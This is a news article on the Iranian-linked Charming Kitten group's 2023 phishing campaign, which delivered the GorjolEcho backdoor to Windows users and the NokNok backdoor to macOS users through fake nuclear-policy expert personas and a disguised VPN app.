Posted on July 10, 2023 at 6:45 PM
Charming Kitten Hackers Deploy A New NokNok Malware Targeting macOS Devices
Cybersecurity researchers have detected a new hacking campaign that is being attributed to the Charming Kitten APT group. During this campaign, the hackers deploy a new NokNok malware that is used to target macOS systems.
Charming Kitten’s hackers deploy a new NokNok malware
The hacking campaign in question started in May, and it is heavily reliant on a different infection chain that was detected previously. LNK files are used to deploy the payloads instead of the typical Word documents that are usually loaded with malware. The past attacks that have been seen by this group usually involve installing malware on Word documents.
Charming Kitten is a hacker group that is also known by other names, such as APT42 or Phosphorous. The group has been linked to at least 30 operations across 14 countries since they started conducting hacking campaigns in 2015, according to a report by Mandiant.
Google has associated the threat actor with the Iranian government and the Islamic Revolutionary Guard Corps (IRGC). The state-sponsored hacker group has been linked to a wide range of hacking campaigns in the past targeting governments and key institutions.
In September last year, the US government reported that it had identified and charged the members of this hacker group. Despite the charges, the hackers have continued to wreak havoc.
A report by Proofpoint said that the threat actor has now abandoned the use of macro-based infection techniques involving Word documents that are infected with malware. Instead, the hacker group deploys LNK files to load the payloads.
The malicious campaign used by the hackers is associated with social engineering strategies and phishing campaigns that have been seen in this campaign. The hackers behind the attack tricked the intended targets into thinking that they were nuclear experts based in the US. They later approached these targets with offers to review the drafts created on foreign policy.
In most of these cases, the hackers usually use other personas within a conversation to have a sense of legitimacy. The move also allows the hackers to have a rapport with the intended target.
Charming Kitten usually depends on impersonation and fake persona assumptions to launch its hacking campaigns. The hackers also rely upon “sock puppets” to generate realistic conversation threats with the targets and launch a hacking campaign.
Hacking exploits on macOS devices
After the Charming Kitten hacker group has gained the interest of the target, it will later send a malicious link. The link contains a Google Script macro that will redirect the victim to a Dropbox URL.
The external source usually hosts a RAR archive that is password-protected. This archive contains a malware dropper that will leverage the PowerShell code. It also comes with an LNK file that stages the malware from a cloud hosting provider.
The final payload used to run these hacking exploits is known as GorjolEcho. The latter is a simple backdoor that is used to accept and execute commands from remote operators. To ensure that the activities of the hacker group are not detected, GorjolEcho will create a PDF that contains previous conversations between the hackers and the intended victims.
If the victim relies on macOS, the hackers will realize it after failing to trigger an infection with the Windows payload. The hackers will also send a link to “library-store[.]camdvr[.]org that contains a ZIP file hiding as a Royal United Services Institute (RUSI) VPN application.
After an Apple script file in the archive has been executed, a curl command will locate the NokNok payload and create a backdoor within the victim’s system. The NokNok backdoor usually has a system identifier and later deploys four bash script modules for persistence, create communication with the command and control server, and exfiltrate data.
The NokNok malware will also collect system information, including the OS version that the target device is running on, the ongoing process, and the applications that have been installed. The malware will encrypt the gathered data and encode it using the base64 format before exfiltrating it.
The Proofpoint research has also said that the NokNok backdoor might be used to facilitate espionage campaigns through other modules. The suspicion depends on the similarities of the code to GhostEcho.
The backdoor also comes with the ability to capture screenshots, command execution, and clean the infection trail. NokNok also contains these functions. The entire campaign shows that Charming Kitten is highly adaptable, and it can target macOS systems if need be. It also shows that there is an increased threat of hacking campaigns through old and new techniques.